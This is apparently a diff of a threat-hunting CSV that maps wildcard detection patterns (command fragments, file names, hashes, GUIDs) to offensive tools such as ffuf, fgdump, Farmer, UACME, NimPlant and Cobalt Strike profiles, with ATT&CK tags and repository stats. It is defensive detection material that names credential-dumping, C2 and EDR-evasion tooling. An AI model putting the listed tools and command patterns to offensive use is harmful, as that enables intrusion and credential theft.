Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2513","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*fake-sms-main*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*faketime '202* zsh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*farmer.exe *\windows\temp*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*farmer.exe 8888 60*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" 
@@ -10219,12 +10370,12 @@ "*FastjsonScan.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*fasttrack/wordlist.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*favfreak-http*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*fb5dc2d637faab73729d65323fcc7d4b7edf43bf9f3de8d8e65ea55670229815*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*fb5dc2d637faab73729d65323fcc7d4b7edf43bf9f3de8d8e65ea55670229815*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*fcrackzip *","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*fcrackzip *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*fcrackzip *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*fcrackzip -u -v -D -p *.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*fde1b109f9704ff7.css*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*fde1b109f9704ff7.css*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*FE4414D9-1D7E-4EEB-B781-D278FE7A5619*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","0","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*FE8F0D23-BDD1-416D-8285-F947BA86D155*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege 
Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*fea01b74-7a60-4142-a54d-7aa8f6471c00*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" 
@@ -10235,137 +10386,137 @@ "*fee -c */* -w 64 | *","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*feroxbuster -w *fzf-wordlists* -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Fertiliser.exe \\*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" -"*ff_osx_extension-dropper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*ff3f6b103b45ea48c5fa447854a35950378ce7558868d4975fd5b11202d0a991*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ff_osx_extension-dropper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ff3f6b103b45ea48c5fa447854a35950378ce7558868d4975fd5b11202d0a991*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*FFA0FDDE-BE70-49E4-97DE-753304EF1113*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*FFA0FDDE-BE70-49E4-97DE-753304EF1113*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable 
drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*ffuf *-input-cmd*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf *-u http*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf -c *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*FFA0FDDE-BE70-49E4-97DE-753304EF1113*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*ffuf *-input-cmd*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf *-u http*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf -c 
*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" "*ffuf -fs 185 -c -w *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ffuf -w *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf.exe*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf/ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf_*_freebsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf_*_linux_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" 
-"*ffuf_*_macOS_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf_*_openbsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf_*_windows_*.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf-master.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf -w *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf.exe*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf/ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_freebsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - 
TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_linux_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_macOS_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_openbsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_windows_*.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf-master.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" "*fgdump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fgexec.exe*","offensive_tool_keyword","fgdump","A utility for dumping 
passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fierce --domain* --dns-servers *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*FiercePhish*","offensive_tool_keyword","FiercePhish","FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns. schedule sending of emails. and much more. The features will continue to be expanded and will include website spoofing. click tracking. and extensive notification options. ","T1566 - T1566.001 - T1566.002 - T1566.003","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Phishing","https://github.com/Raikia/FiercePhish","1","1","N/A","N/A","10","1214","273","2023-05-18T15:38:38Z","2016-12-31T19:41:24Z" "*Fiesta Exploit Kit*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*File_Smuggler_Http_Handler*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*FileControler/FileControler_x64.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*FileControler/FileControler_x86.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*File_Smuggler_Http_Handler*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*FileControler/FileControler_x64.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*FileControler/FileControler_x86.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 